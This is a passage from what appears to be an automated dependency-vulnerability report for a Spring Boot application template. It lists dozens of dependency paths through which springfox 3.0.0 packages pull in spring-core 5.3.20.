  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
